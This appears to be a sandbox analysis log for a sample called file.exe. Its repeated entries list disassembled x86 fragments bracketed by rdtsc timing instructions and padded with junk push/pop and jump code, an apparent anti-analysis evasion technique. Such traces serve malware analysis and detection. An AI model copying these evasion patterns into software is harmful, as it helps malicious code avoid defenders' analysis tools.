Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEF694 second address: EEF6A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 jp 00007F8854FD8856h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEF833 second address: EEF83F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEF83F second address: EEF843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEF843 second address: EEF85B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB92h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF7661 second address: EF7669 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF7669 second address: EF7679 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB8Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF79F6 second address: EF79FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF79FC second address: EF7A1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB8Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F8854FAEB94h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF7A1E second address: EF7A24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF7A24 second address: EF7A28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF907F second address: EF9083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF9083 second address: EF908D instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8854FAEB86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF908D second address: EF909E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8854FD885Ah 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF909E second address: EF90E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jne 00007F8854FAEB86h 0x0000000c push edi 0x0000000d pop edi 0x0000000e jmp 00007F8854FAEB8Eh 0x00000013 push edi 0x00000014 pop edi 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 pushad 0x0000001a jo 00007F8854FAEB86h 0x00000020 jo 00007F8854FAEB86h 0x00000026 push ebx 0x00000027 pop ebx 0x00000028 popad 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F8854FAEB92h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF90E4 second address: EF90ED instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF90ED second address: EF90F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF6DFB second address: EF6DFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF6DFF second address: EF6E05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E35EE2 second address: E35EF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8854FD885Dh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E35EF6 second address: E35EFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F01672 second address: F0168B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD885Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0168B second address: F0168F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F12749 second address: F1274E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F17182 second address: F1719F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F8854FAEB86h 0x0000000a jmp 00007F8854FAEB93h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1F4B7 second address: F1F4C3 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8854FD885Eh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F20DA7 second address: F20DAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F20DAD second address: F20DB9 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8854FD8856h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F20DB9 second address: F20DC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F8854FAEB86h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F279AC second address: F279B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F279B0 second address: F279BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F27E19 second address: F27E1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F28200 second address: F2820D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F8854FAEB86h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2820D second address: F2821B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jne 00007F8854FD8856h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2821B second address: F28221 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F28DDA second address: F28DDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F28DDE second address: F28DE4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F28DE4 second address: F28DFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F8854FD8858h 0x0000000c push edx 0x0000000d pop edx 0x0000000e jne 00007F8854FD885Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2DF0B second address: F2DF15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F38AC9 second address: F38ACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F38ACF second address: F38ADF instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8854FAEB86h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F38ADF second address: F38AE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F38AE5 second address: F38AFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB8Ch 0x00000007 jl 00007F8854FAEB86h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F38990 second address: F38996 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F38996 second address: F3899B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F4CA43 second address: F4CA4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F4CA4C second address: F4CA62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8854FAEB8Eh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F4C762 second address: F4C77B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD885Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jng 00007F8854FD8856h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F661EE second address: F661F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F650CF second address: F650D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F650D5 second address: F650DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F650DB second address: F650DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F650DF second address: F65101 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F8854FAEB93h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c jnp 00007F8854FAEB86h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F654C4 second address: F654D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8854FD885Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F65642 second address: F65650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F8854FAEB86h 0x0000000a popad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F65650 second address: F6565B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F8854FD8856h 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6565B second address: F65668 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F8854FAEB86h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F65907 second address: F65928 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD8868h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F65928 second address: F65950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F8854FAEB8Ah 0x0000000e jmp 00007F8854FAEB95h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F65950 second address: F6595F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8854FD8856h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6A259 second address: F6A267 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8854FAEB8Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6A745 second address: F6A79E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8854FD885Ah 0x00000009 popad 0x0000000a nop 0x0000000b or edx, 29B455ADh 0x00000011 push dword ptr [ebp+12456472h] 0x00000017 push edi 0x00000018 push ebx 0x00000019 mov edx, dword ptr [ebp+122D5AC0h] 0x0000001f pop edx 0x00000020 pop edx 0x00000021 call 00007F8854FD8859h 0x00000026 jmp 00007F8854FD885Ch 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F8854FD885Eh 0x00000032 pop edx 0x00000033 mov eax, dword ptr [esp+04h] 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a js 00007F8854FD8856h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6C001 second address: F6C008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6C008 second address: F6C015 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F8854FD8856h 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10BD1 second address: 4E10BFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB95h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007F8854FAEBE1h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov edx, 1E5E7ACEh 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10BFB second address: 4E10C10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8854FD8861h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10C10 second address: 4E10C2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add eax, ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10C2F second address: 4E10C35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10C35 second address: 4E10C63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB92h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax+00000860h] 0x0000000f pushad 0x00000010 mov si, 0FFDh 0x00000014 mov ax, AEF9h 0x00000018 popad 0x00000019 test eax, eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10C63 second address: 4E10C67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10C67 second address: 4E10C6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10C6D second address: 4E10C73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10C73 second address: 4E10C77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E88037 second address: E88040 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E88040 second address: E8804D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E883E5 second address: E883EF instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8854FD8856h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E883EF second address: E883F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F8854FAEB86h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E883F9 second address: E883FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E303C7 second address: 4E303F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F8854FAEB96h 0x00000010 mov edx, dword ptr [ebp+0Ch] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov ax, di 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E303F8 second address: 4E30423 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD8865h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d call 00007F8854FD885Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E3045B second address: 4E30461 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E30461 second address: 4E30465 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20628 second address: 4E2062C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E2062C second address: 4E20649 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD8869h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20649 second address: 4E2064F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E2064F second address: 4E20653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20653 second address: 4E20657 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20657 second address: 4E20689 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F8854FD8860h 0x00000013 adc ch, 00000068h 0x00000016 jmp 00007F8854FD885Bh 0x0000001b popfd 0x0000001c mov ax, F15Fh 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20689 second address: 4E2069D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8854FAEB90h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E2069D second address: 4E206ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD885Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c pushad 0x0000000d movzx eax, bx 0x00000010 push ebx 0x00000011 pushfd 0x00000012 jmp 00007F8854FD885Ch 0x00000017 adc ecx, 123D1428h 0x0000001d jmp 00007F8854FD885Bh 0x00000022 popfd 0x00000023 pop eax 0x00000024 popad 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F8854FD8865h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E206ED second address: 4E206FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8854FAEB8Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E206FD second address: 4E20701 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20701 second address: 4E20716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov esi, 7473B5EFh 0x00000011 movzx eax, di 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20716 second address: 4E20730 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 5C8C6783h 0x00000008 push esi 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, esi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 movsx edi, ax 0x00000014 mov esi, 12A2D7CFh 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20730 second address: 4E20736 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20736 second address: 4E2073A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E2073A second address: 4E20767 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB97h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F8854FAEB8Bh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20767 second address: 4E2076D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E2076D second address: 4E20773 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20773 second address: 4E20777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20777 second address: 4E20795 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d push ecx 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
